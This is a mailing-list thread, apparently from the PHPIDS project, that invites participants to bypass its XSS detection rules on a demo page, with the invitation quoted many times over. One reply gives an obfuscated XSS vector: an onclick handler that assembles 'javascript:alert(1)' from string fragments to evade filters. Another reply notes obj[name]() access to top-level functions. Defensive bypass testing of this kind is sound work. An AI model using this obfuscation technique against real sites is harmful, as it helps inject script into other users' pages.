After talking to Christian and SirDarckCat I decided to make this post - even if it may sound a little bit provocative ;) We spend lots of time with the rules and except from some details we are pretty content with them.
So if you like and find some time give them a new try - anyone who will manage to create an XSS on the demo page will be mentioned in the next release notes and will (if wanted) get a dedicated interview on the blog (SirDarckCat's interview will appear the next days - he was again quicker than light with some vectors mentioned in the release post).
Allowed are the following browsers: - Firefox 1.5+ - IE 6+ - Opera 9+ - Safari 2+ - Konqueror 3.5+
Any vector which will be able to create an alert/content change via JS on the demo page counts - as long as a PoC of what form ever can be provided. A similar contest will follow the next weeks for SQL Injection.
Make Giorgios threesome a foursome. obj[name]() works as well, giving access to all top level functions/ objects. Low impact in general, but this might be combined with other things...
> Make Giorgios threesome a foursome. > obj[name]() works as well, giving access to all top level functions/ > objects. > Low impact in general, but this might be combined with other things...
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
Now this is a strange one:- h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+ 'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;
It should work cause I tested it locally however it doesn't seem to execute on your site. I've no idea why, maybe some characters are cause the onclick handler to produce invalid data. The code above get pass your filters though,
Tested this is Firefox locally and it worked:- <a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+ '';s3=''+'pt'+'';s4=''==''?':': 0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;" href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> wrote:
> After talking to Christian and SirDarckCat I decided to make this post > - even if it may sound a little bit provocative ;) We spend lots of > time with the rules and except from some details we are pretty content > with them.
> So if you like and find some time give them a new try - anyone who > will manage to create an XSS on the demo page will be mentioned in the > next release notes and will (if wanted) get a dedicated interview on > the blog (SirDarckCat's interview will appear the next days - he was > again quicker than light with some vectors mentioned in the release > post).
> Allowed are the following browsers: > - Firefox 1.5+ > - IE 6+ > - Opera 9+ > - Safari 2+ > - Konqueror 3.5+
> Any vector which will be able to create an alert/content change via JS > on the demo page counts - as long as a PoC of what form ever can be > provided. A similar contest will follow the next weeks for SQL > Injection.
> It should work cause I tested it locally however it doesn't seem to > execute on your site. I've no idea why, maybe some characters are > cause the onclick handler to produce invalid data. The code above get > pass your filters though,
> Tested this is Firefox locally and it worked:- > <a
> On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > wrote: > > Hi!
> > After talking to Christian and SirDarckCat I decided to make this post > > - even if it may sound a little bit provocative ;) We spend lots of > > time with the rules and except from some details we are pretty content > > with them.
> > So if you like and find some time give them a new try - anyone who > > will manage to create an XSS on the demo page will be mentioned in the > > next release notes and will (if wanted) get a dedicated interview on > > the blog (SirDarckCat's interview will appear the next days - he was > > again quicker than light with some vectors mentioned in the release > > post).
> > Allowed are the following browsers: > > - Firefox 1.5+ > > - IE 6+ > > - Opera 9+ > > - Safari 2+ > > - Konqueror 3.5+
> > Any vector which will be able to create an alert/content change via JS > > on the demo page counts - as long as a PoC of what form ever can be > > provided. A similar contest will follow the next weeks for SQL > > Injection.
> > It should work cause I tested it locally however it doesn't seem to > > execute on your site. I've no idea why, maybe some characters are > > cause the onclick handler to produce invalid data. The code above get > > pass your filters though,
> > Tested this is Firefox locally and it worked:- > > <a
> > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > wrote: > > > Hi!
> > > After talking to Christian and SirDarckCat I decided to make this post > > > - even if it may sound a little bit provocative ;) We spend lots of > > > time with the rules and except from some details we are pretty content > > > with them.
> > > So if you like and find some time give them a new try - anyone who > > > will manage to create an XSS on the demo page will be mentioned in the > > > next release notes and will (if wanted) get a dedicated interview on > > > the blog (SirDarckCat's interview will appear the next days - he was > > > again quicker than light with some vectors mentioned in the release > > > post).
> > > Allowed are the following browsers: > > > - Firefox 1.5+ > > > - IE 6+ > > > - Opera 9+ > > > - Safari 2+ > > > - Konqueror 3.5+
> > > Any vector which will be able to create an alert/content change via JS > > > on the demo page counts - as long as a PoC of what form ever can be > > > provided. A similar contest will follow the next weeks for SQL > > > Injection.
> > > It should work cause I tested it locally however it doesn't seem to > > > execute on your site. I've no idea why, maybe some characters are > > > cause the onclick handler to produce invalid data. The code above get > > > pass your filters though,
> > > Tested this is Firefox locally and it worked:- > > > <a
> > > On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com> > > > wrote: > > > > Hi!
> > > > After talking to Christian and SirDarckCat I decided to make this post > > > > - even if it may sound a little bit provocative ;) We spend lots of > > > > time with the rules and except from some details we are pretty content > > > > with them.
> > > > So if you like and find some time give them a new try - anyone who > > > > will manage to create an XSS on the demo page will be mentioned in the > > > > next release notes and will (if wanted) get a dedicated interview on > > > > the blog (SirDarckCat's interview will appear the next days - he was > > > > again quicker than light with some vectors mentioned in the release > > > > post).
> > > > Any vector which will be able to create an alert/content change via JS > > > > on the demo page counts - as long as a PoC of what form ever can be > > > > provided. A similar contest will follow the next weeks for SQL > > > > Injection.
